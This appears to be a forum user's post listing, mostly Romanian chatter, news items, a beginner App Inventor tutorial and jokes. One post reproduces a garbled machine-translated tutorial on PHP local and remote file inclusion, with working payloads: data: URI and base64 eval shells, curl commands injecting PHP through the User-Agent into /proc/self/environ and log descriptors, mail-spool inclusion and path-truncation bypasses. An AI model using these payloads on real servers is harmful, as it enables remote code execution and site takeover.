Jump to content

ZeroCold

Active Members
  • Posts

    1376
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by ZeroCold

  1. See you there!
  2. Chestiile de genu se gasesc pe yt, cautati dupa "farmville 2 cheat engine... etc". Era mai interesant daca prezentai in tutorial modul in care gasesti adresele respective si cum iti dai seama care si cum trebuie editate.
  3. L-am gasit pe undeva pe HF. Translated from an advanced russian underground forum Ask yourself: what do you know about the remote or local file inclusion? Surely, the answer will be the following sentence: "circumcision with an unwanted expansion of Bernoulli-byte", "include session files from / tmp, images from a shell, apache logs ...». I hasten to assure you that this is not all ways to squeeze the absolute maximum of include! Now I will talk about the details of recently published an interesting way to use this common bug. Minutes «Data» The first thing I want you to meet a great way to circumvent many clever filtering at the remote include. This method is to use the protocol Data (for the understanding of the protocol is desirable to study RFC 2397, references to which, as always, look in the footnotes). So, imagine that in the test php-script (php> = 5.2.0 - with this version includes support for data and other protocols) contains the following <?php $dir = $_GET['dir']; //our mega-filter $dir = str_replace(array('http://','ftp://','/','.'), '', $dir); //default file to any directory include $dir .= '/pages/default.php'; //actually, include include($dir . '/pages/default.php'); ?> It seems that in this situation, not a ride no remote include. After all, except that the cut standard 'http://', ??'ftp://', ??come under the knife filter also point to a slash! And now look carefully at the next exploit to our RFI and beautiful bypass the filter, which prevents hackers faithful (as with any other remote inkluda directive PHP - allow_url_include, of course, must be set to On) http://localhost/index.php?dir=data:,<?php eval($_REQUEST[cmd]); ?>&cmd=phpinfo(); This code is quite well show you the output of the phpinfo ()! But what happens when the filter becomes more rigid and takes roughly the form? <?php ... //A fancy filter $dir = str_replace(array('_',']','[',')','(','$','http://','ftp://','/','.'), '', $dir); $dir = htmlspecialchars($dir); ... ?> You might think again that it is impossible to execute arbitrary php-code (even in the above scenario) as well as filter cut almost all the characters used in this evil-code. But no such luck. Already a favorite with your protocol «data» support such a useful thing as base64 (by the way, if filtered, and the characters "+", "=," sure, you can pick up base64-value of its shell without them). http://localhost/index.php?dir=data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8+&cmd=phpinfo(); («+» to replace the url-encoded «%2b») And again on the screen phpinfo ()! But we can not dwell on the mere RFI. Get ready for some very delicious. Courteous /proc/self/environ Imagine that on a certain site (http://site.com) present the following <?php $page = $_GET['page']; include('./pages/'.$page); ?> Then imagine that the opportunity to fill the file /image with a shell We have no way to apache logs, we never found, and in /tmp are not saved session data. Neighboring sites is also no. What should I do? Inexperienced in LFI hacker dropped to his hands. We are not one of those, for help in a hurry storage environment variable /proc/self/ environ! So when we ask for any php-page on the server, creates a new process. In * nix-systems, each process has its own entry in / proc, and / proc / self, in turn - this is a static path and a symbolic link, which contains useful information for the latter process. If we inject our evil-code in the /proc/self/environ, it will be able to run arbitrary commands with the LFI:). Attractive? And now, in fact, the question is how to insert its value from evil-code in the /proc/self/ environ? Very easy! In the same way that you inject your code into apache logs, you can proinzhektit code and /proc/self/environ. For example, take our favorite and is easily replaced user agent. By default of / proc / self / environ, showing the useragent, looks like this: PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin SERVER_ADMIN=admin@site.com ... Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=150... Now change to user agent <?php eval($_GET[cmd]); ?> and turn to our vulnerable script as follows: curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>" As expected, the function phpinfo () succeeds. In this part of /proc/self/environ with injection will look like: PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin SERVER_ADMIN=admin@site.com ... <?php eval($_GET[cmd]); ?> HTTP_KEEP_ALIVE=150 ... The method is good in all, except that the string yuzeragenta and evil-code should be implemented quickly and at the same time (as your code in / proc / self / environ can easily modify any other newly launched process.) Therefore, the winding back the acquired knowledge into their heads, move to the next method. Logs, we will find you! Again, imagine that we have a site with a local include but proinkludit nothing. How do you know the location of apache access_log and error_log? Secretly I say that to know where they are, not necessarily! For us, tried all the same / proc, since there is a convenient symbolic link to the actual location of logs apache. Use it for include in several ways: 1. Through the process id and labels /proc/%{PID}/fd/%{FD_ID} Here:% {PID} - id of the process (see if you can by reading/proc/self/status),% {FD_ID} - shortcuts to the files (usually 2 and 7 - Apache logs). Exemple: http://site.com/index.php?page=../../../../../../../../proc/self/status Suppose,% {PID} is equal to 1228, then end the exploit is as follows: curl "http://site.com/index.php?page=../../../../../../../../proc/1228/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>" 2. directly, without the recognition process id curl "http://site.com/index.php?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>" This method is more suitable for you, as «self» - this is always the current process, and in the first case,% {PID} has a bad property often vary. In both these ways, as in any other Apache log LFI, those same logic, of course, must be available for reading. Useful soap At this time you need to imagine that the site does not work all the victims of the previous methods LFI. And incredibly scary! But such cases do happen, and Italian hackers have been able to come up with amazing secteam inkluda way through the usual e-mail! Thus, the most common web applications contain a function to send soap as part of the registration system, any subscriptions, etc. Often, the user can modify the contents of the letter. At the same time, Nix could save a soap locally. LFI technique itself through the mail is as follows: 1. I have a profile of the attacker's Web application on a vulnerable server. 2. The attacker modifies any part of the profile (for example, about), which should come in the letter as proof of change of information at your evil-php code, prepared for the local inkluda. 3. The attacker modifies the e-mail to www-data @ localhost (www-data - user, who is running under httpd; they can be values ??such as «apache», «wwwrun», «nobody», «wwwdata», etc. ..) In the end, sent the soap will be in /var/mail (or in /var/spool/mail) and have a user name httpd. Here is an exploit for this method: curl "http://site.com/index.php?page=../../../../../../../../var/mail/www-data&cmd=phpinfo();" It should also be noted that the mail-file will be available only to the user to whom the letter and is intended (ie, Apache must be sure to run under the same user). Null-byte resting Again, your imagination and imagine that all of the above methods work well, but the vulnerable application contains at this time, the following <?php $page = $_GET['page']; //Protection against "zero toxic" if (!get_magic_quotes_gpc()) $page = addslashes($page); include('./pages/'.$page.'.php'); ?> What to do? You can proinkludit logs, but in the end is appended not to cut the usual 00% extension «. Php». At this time you will feature (or is it a vulnerability?) Of the php, found users of popular forum zabugornogo hacker with a funny nickname sla.ckers.org barbarianbob. Feature is that the interpreter php while processing the path to any file or folder cuts the extra characters "/" and «/.», as well, depending on the platform, uses a certain limitation on the length of the path itself (the restriction is stored in constant MAXPATHLEN). As a result, everything outside of this value are discarded. Now let's take a closer look, this vector LFI, turning to a vulnerable script as follows: curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ//[Slashe 4096]//&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>" Our favorite phpinfo (); will succeed due to several reasons. 1. include in the script takes the following form - <?php ... include('./pages/../../../../../../../../proc/self/environ//[Slashe 4096]////.php'); ... ?> 2. Since our path will be much longer than MAXPATHLEN (by the way, not necessarily it is equal to exactly 4096; in windsurfing, for example, it can be equal to only 200 characters with a tail - the Council for each system tests the value separately), then the characters are at the end of the path (in this case - a number of slashes and «. php»), the interpreter php, without asking permission from anyone who successfully cut off. 3. After paragraph "2", our code will look like this: <?php ... include('./pages/../../../../../../../../proc/self/environ//[a lot of slashes]'); ... ?> As you already know, the extra slash at the end of the path also cuts the php helpful, and our malicious code, in the end, turn into a fully working LFI! <?php ... include('./pages/../../../../../../../../proc/self/environ'); ... ?> To test the number of slashes to use this vulnerability on its server advise to try the following php-script. <?php //what file to proinkludit $file_for_include = 'work.txt'; for($i=1;$i<=4096;$i++) { $its_work = file_get_contents('http://localhost/test/'.$file_for_include.str_repeat('/',$i).'.php'); if($its_work=='1') { print 'slashes Used: '.$i; break; } } ?> Next to the script just put the file with work.txt written in it yedinichku. If include occurred successfully, the script displays the number of slashes you used for this very include. For complete understanding of the technical aspects of this bug advise very carefully examine the relevant references in the footnotes. And finally ... As you can see, progress in reserchinge vulnerabilities are not standing still. New bugs are not in the php-scripts, and in the shell php! What was once seemed impossible to break, it now seems nothing more than a childish prank and fun for hardened hacker. Null-byte has almost sunk into oblivion, apache logs include acquires new sophisticated methods, RFI is available through protocols other than ftp and http ... What's next? Wait and see.
  4. Imi place! La ultimile subiecte ar fi super daca le-ai afisa ceva de genu: Nume thread - data - de xulescu - data ultimul post; Ai mai putea pune un href hover verde inchis, sa fie mai interactiv; Ar fi super daca nu ai limita doar la 20, ci sa mi le arate pe toate sau eventual sa pot sa imi setez eu cate sa afiseze.
  5. Merge mai bine: 1. Te duci in club; 2. Te uiti dupa tipe care danseaza cu alte tipe si tot se uita in jur; 3. Le inviti la dans; 4. Le oferi ceva de baut; 5. Te oferi sa le conduci, acasa la tine ca pana la ele e prea mult de mers.
  6. Ideea e foarte buna, dar daca vrei sa o implementezi in RST, ar trebui sa le interzici utilizatorilor sa vada rezultatele pana nu isi trimit propria prezentare.
  7. Noi nu am auzit de tine, probabil esti mai penibil decat el. Cred ca vorbesc in numele tuturor cand zic ca nu ne intereseaza ce a facut inainte sa vina aici, cine a fost sau cine este... atata timp cat nu face gafe de acum inainte si vrea sa invete, sa ajute comunitatea e ok. @nampleaca, be welcome.
  8. Cum a zis k1d, trebuie sa instalezi aplicatiile de la ei daca vrei si emulator.
  9. Sa iti spun direct nu stiu, nu am incercat personal, uita-te pe aici. Daca reusesti, poti sa scrii un tutorial. @all, cu placere.
  10. Am promis mai demult ca o sa fac un tutorial pe tema asta. L-am facut mai in graba, "mecanic" pentru site-ul meu, cine este interesat si vrea sa invete cauta singur. Luati-l mai mult ca pe un "teaser". _____ Am citit mai demult intr-o revista (chip din cate imi aduc aminte), despre cum sa creezi o aplicatie android. Initial ma gandeam ca trebuie sa stiu programare, ma gandeam ca trebuie sa am cunostinte avansate java sau alte chestii de genu. De fapt nu trebuie sa stii foarte multa programare, cu un minim de cunostinte poti sa iti creezi propria aplicatie foarte usor. Voi scrie un “tutorial mecanic”, in sensul ca nu voi mai explica ce face x, y, de ce asa si nu asa. Va voi arata cum se face un hello world pas cu pas dar fara a explica anumite chestii, nu am nici timp si nici chef. Daca va intereseaza subiectul veti incerca sa invatati mai multe singuri. In primul rand intrati aici, si va logati cu contul dvs. google, daca nu aveti unul, va faceti. Dupa login va arata asa: In cazul vostru, nu veti avea nici un proiect. Dati click pe new, in partea stanga sus, va trebui sa dati un nume proiectului. Eu il voi numi Hello_BetaCode: Imediat ce ati dat ok se va deschide o interfata ce va permite sa va creeati aplicatia vizual, pt cei ce au mai folosit VisualBasic sau Visual C va fi foarte simplu. Am zis de la inceputul articolului, voi incerca sa fiu cat mai concis, daca doriti sa invatati mai multe, google is your friend. Din partea stanga tragem butonul Label peste screen1, ca in imaginea de mai jos: Dam click pe Text for Label1 iar in partea dreapta avem mai multe proprietati: Putem seta culoarea de fundal, putem seta daca textul va fi bold, italic, dimensiunea textului etc. La text putem modifica continutul label-ului, eu am scris Hello BetaCode!, veti observa ca imediat ce am terminat de scris si am dat un click in afara casetei, textul din stanga se va modifica cu textul vostru. Va puteti juca cu mai multe chestii, puteti adauga imagini, linkuri, puteti face liste, desene si multe alte lucruri. Am mai adaugat un label in care am scris www.betacode.info si am modificat numele ecranului in BetaCode. Pt a modifica numele ecranului (acolo un scrie Screen1) dati click pe aplicatie (partea din mijloc) iar la proprietati aveti la fel ca la Label, unde puteti scrie orice vreti. Codul sursa al aplicatiei arata ca un puzzle, pentru al deschide trebuie sa aveti instalat java, il descarcati gratuit de aici si de aplicatiile astea ce va vor instala emulatorul pt android, editorul si alte lucruri esentiale pt dezvoltarea aplicatiilor. Dupa ce ati descarcat si instalat java, dati click pe Open the Blocks Editor in partea dreapta sus a aplicatiei. Se va descarca un fisier AppInvaentorBlaBla, dati click pe el si se va deschide automat daca ati instalat kitul java si cel de la appinventor. Va arata asa: “Codul sursa” va fi gol, deoarece avem doar 2 label-uri, in momentul in care veti vrea sa creeati o aplicatie mai complexa, cu butoane, mai multe ecrane, animatii si alte lucruri va trebui sa lucrati mai mult de aici decat din partea vizuala. In partea stanga avem o lista cu categorii, unde gasiti functii ce arata ca piesele de puzzle (de asta ziceam mai inainte). Pentru a folosi o functie, tineti click pe ea si o trageti in partea goala, cea unde veti lucra. Asa arata un cod sursa ceva mai complex (l-am luat de pe google): Dupa ce ati terminat aplicatia, pentru a o salva ca .apk deschideti iar iterfata de la inceput si dati click pe Package for Phone si modul in care vreti sa o salveze (barcode, in pc, direct pe telefon): Asta este tot. Mai multe tutoriale gasiti pe google sau pe site-ul lor. Daca aveti intrebari, lasati reply. #Sursa, aici.
  11. Nu exista prosti in general, fiecare este bun la ceva. Poti sa zici ca esti prost la mate dar sa fii bun la info.. sau prost la hacking dar rupi la programare... etc. Daca cineva are eticheta de prost si este aratat cu degetul nu inseamna ca nu poate sterge pe jos cu tine cand esti pe zona lui.
  12. E o problema "interna", cineva a copiat niste chestii si a picat vina pe mine. Pana nu se rezolva problema, nu mai am ce cauta pe aici. ps: mersi.
  13. Eram sigur ca o sa zici ceva, da-mi add pe mess sa vorbim acolo. zeroocoldd
  14. Nu are nici o legatura cu forumul, dar mesajul pe care il trimite este important, so just read it. "A man sat at a metro station in Washington DC and started to play the violin; it was a cold January morning. He played six Bach pieces for about 45 minutes. During that time, since it was rush hour, it was calculated that 1,100 people went through the station, most of them on their way to work. Three minutes went by, and a middle aged man noticed there was musician playing. He slowed his pace, and stopped for a few seconds, and then hurried up to meet his schedule. A minute later, the violinist received his first dollar tip: a woman threw the money in the till and without stopping, and continued to walk. A few minutes later, someone leaned against the wall to listen to him, but the man looked at his watch and started to walk again. Clearly he was late for work. The one who paid the most attention was a 3 year old boy. His mother tagged him along, hurried, but the kid stopped to look at the violinist. Finally, the mother pushed hard, and the child continued to walk, turning his head all the time. This action was repeated by several other children. All the parents, without exception, forced them to move on. In the 45 minutes the musician played, only 6 people stopped and stayed for a while. About 20 gave him money, but continued to walk their normal pace. He collected $32. When he finished playing and silence took over, no one noticed it. No one applauded, nor was there any recognition. No one knew this, but the violinist was Joshua Bell, one of the most talented musicians in the world. He had just played one of the most intricate pieces ever written, on a violin worth $3.5 million dollars. Two days before his playing in the subway, Joshua Bell sold out at a theater in Boston where the seats averaged $100. This is a real story. Joshua Bellplaying incognito in the metro station was organized by the Washington Post as part of a social experiment about perception, taste, and priorities of people. The outlines were: in a commonplace environment at an inappropriate hour: Do we perceive beauty? Do we stop to appreciate it? Do we recognize the talent in an unexpected context? One of the possible conclusions from this experience could be: If we do not have a moment to stop and listen to one of the best musicians in the world playing the best music ever written, how many other things are we missing?"
  15. Same shit, doar ca un Golf 5 + tuning Restu ii investesc in ceva sau fac cursuri si traininguri pana ajung la nivelul ala, imi fac singur programul si il vand cu 200.000 euro
  16. Daca ai posibilitatea, dute! Eu as merge dar am restante + my birthday... Bafta!
  17. 12 echipe de studenti din facultati tehnice au posibilitatea de a intra intr-un program de mentorat de 4 luni, in care pot dezvolta o idee de produs/aplicatie, sprijiniti de mentori experimentati din industria IT&C. Innovation Labs este un proiect national al TechSoup si TechLounge, realizat cu sprijinul Microsoft Romania, care cultiva spiritul inovator al tinerilor din facultati tehnice si il completeaza cu notiuni de leadership, marketing, management sau cercetare de piata. Pentru a lua parte la mentorat studentii trebuie sa participe la un hackathon organizat la Universitatea Politehnica din Bucuresti. Innovation Labs Hackathon va avea loc pe 2 martie 2013 si va consta intr-un maraton de 24 de ore de programare si incubat idei din domenii precum sanatate, jocuri, lifestyle si fitness. Dupa hackathon, cele mai bune 12 echipe se vor al?tura programului de mentorat care va dura 4 luni. Inscrierile se pot face pana pe 27 februarie 2013, completand formularul special dedicat de pe www.innovationlabs.ro. #sursa: BetaCode.
  18. Link aici: The secret server
  19. Filmul prezinta diferitele puncte de vedere, de la cei care au creat si mentinut site-ul The Pirate Bay pana la cei care sunt de partea cealalata a problemei, in banca procurorilor si a avocatilor care au activat la acest proces. Esenta acestui proces este data in primul rand de materialele distribuite prin torrenti in mod ilegal, incalcand drepturile de autor ale producatorilor, si de faptul ca Pirate Bay a profitat de pe urma traficului adus pentru a castiga bani. Unul dintre aspectele interesante ale filmului reprezinta reactiile celor care au conceput acest site, si modul cum s-a desfasurat toata operatiunea. Cel mai important de retinut este probabil faptul ca ideea si conceptul lor nu a putut fi oprit. Site-ul inca functioneaza, si-a schimbat putin politica insa este inca activ, are mai multi utilizatori decat orice alt site de file-sharing si chiar depaseste cu mult numarul de utilizatori al unui site de sharing de continut audio-video platit. Video: #sursa: BetaCode.info
  20. Editia a saptea a concursului de hackeri PWN2OWN pune la bataie o suma impresionanta celor pasionati de hacking. Marile companii de software aduc in fata hackerilor in perioada 6-8 Martie browserele si plugin-urile lor pentru a fi testate la un nivel extrem si ofera recompense pe masura celor care reusesc sa treaca de sistemele de securitate. PWN2OWN este un concurs care a avut o prima editie controversata, în anul 2007, de atunci increderea marilor dezvoltatori crescand exponential. Ideea acestui concurs a plecat de la Dragos Ruiu, un canadian de origine romana care, iritat de increderea celor de la Apple ca sistemul lor de operare OS X este impenetrabil (acestia din urma avand chiar o reclama in care trivializau securitatea competitorului Windows), a pus la dispozitie doua MacBook Pro legate fiecare la o conexiune wireless. Cel care reusea sa se conecteze wireless si sa exploateze unul dintre cele doua laptopuri putea pleca acasa cu el. PWN2OWN 2013 a ajuns însa sa fie mai mult decat o lupta pentru un laptop. Premiile din acest an se ofera celor care ofera detalii despre vulnerabilit?tile gasite si modalitatile de a le exploata, asta pentru a oferi dezvoltatorilor sansa de a-si imbunatati produsele. Cea mai mare recompensa sta pe capul unui Google Chrome care ruleaza pe Windows 7 si a IE10 in Windows 8 – 100.000 de dolari, fiind urmata de suma de 75.000 de dolari oferita pentru primul hack impotriva IE9. Si alte premii sunt oferite, dintre ele cele mai atractive fiind cele oferite pentru exploit-uri ale Adobe Flash si Adobe Reader (fiecare 75.000 de dolari), Safari (65.000 de dolari), Firefox (60.000 de dolari) si Java (20.000 de dolari). Despre premiul Java cercetatorul Kostya Kortchinsky spune pe Twitter ca organizatorii dau 20.000 de dolari gratis, facand referire la recentele probleme pe care Oracle le-a avut cu plugin-ul sau. Organizatorul TippingPoint a publicat deja pe site regulile PWN2OWN 2013, urmand sa ofere noutati despre concurs pe un cont dedicat de Twitter. #sursa: betacode.info
  21. Tipuri de cacat 1.Cacatul fantoma: Stii cu siguranta ca l-ai facut. Urme ale sale sunt pe hârtia igienica dar în WC nu este nici urma de cacat. Mai poate fi numit si cacatul Torpedo atunci când a fost auzit cazând în apa din WC... 2.Cacatul teflon: Vine matasos si moale ca nici nu îti dai seama. Pe hârtia igienica nu sunt urme de cacat. Pentru a fi sigur ca a fost facut trebuie sa te uiti în WC... 3.Cacatul cauciucat: Are consistenta bitumului fierbinte si lasa urme gretoase pe faianta WC-ului. De stergi de cel putin 18 ori la cur si acesta nu este înca curat. Trebuie sa îti bagi hârtie igienica în chiloti pentru a nu-i umple de cacat. 4.Cacatul cu aprindere întârziata: Tocmai te-ai sters la cur si te-ai ridicat în picioare...când vine tura urmatoare... 5.Cacatul sarpe: Alunecos de grosimea degetuli mare si are o lungime de cel putin 50 de centimetrii. Are un potential ridicat (la fel ca si cacatul fantoma) de "cacat Torpedo"... 6.Cacatul pluta: Mai este cunoscut si sub numele de "înotatorul". Desi ai tras apa de trei ori el pluteste înca în WC. Doamne! Cum te poti scapa de el? Nu se lasa nicidecum luat de apa. Apare de obicei peste tot, numai în propria locuinta nu... 7.Cacatul dorinta: Parca ai avea furnici în intestine. Transpiri, te basesti, faci totul...în afara de a te caca...apare de obicei la petreceri când te nevoieste sa ocupi WC-ul un timp îndelungat. 8.Cacatul buci-umede: Aceasta specie derivata loveste apa din WC cu o viteza ridicata si la un unghi înclinat astfel încât îti umezeste bucile curului...Cel mai rau la aceasta specie de cacat este ca nu ai niciodata certitudinea daca umezeala de pe bucile tale este apa sau cacat... 9.Cacatul "bloc de ciment": Ma este denumit si cacatul "Doamne-Dumnezeule!". Imediat dupa ce ai început sa-l faci îti doresti din tot sufletul sa îti fi facut în prealabil o anestezie locala. 10.Cacatul King Kong: Mai este cunoscut si sub numele de "cacat elefant". Este asa de mare încât refuza sa dispara în canalizare înainte de a fi maruntit(se recomanda folosirea unui umeras de haine). La fel ca si "cacatul pluta" nu apre decât atunci când te aflii într-un WC strain. 11.Cacatul hemoragie-craniana-interna: Aceasta forma de cacat l-a ucis pe Elvis. El vine de abia dupa eforturi îndelungate ai schimbat culori de la rosu la verde si apoi albastru. 12.Cacatul bere: Una din cele mai rele dar si una din cele mai raspândite forme de cacat. Apare în ziua urmatoare noptii de dinainte. În mod obisnuit nici nu miroase asa de rau, dar aparentele înseala. WC-ul este stropit cu el de sus pâna jos de parca ai fi tras cu o flinta cu alice. Te si miri ca din gaura curului tau cacatul poate fi împrastiat în atâtea directii. Dupa aceea observi ca hârtia igienica s-a terminat si closetul nu este prevazut cu o perie. Apare la fel ca si alte forme numai în WC-uri straine.
  22. Cel mai tare: =]] fata de ce am avut inainte, asta rupe \m/
×
×
  • Create New...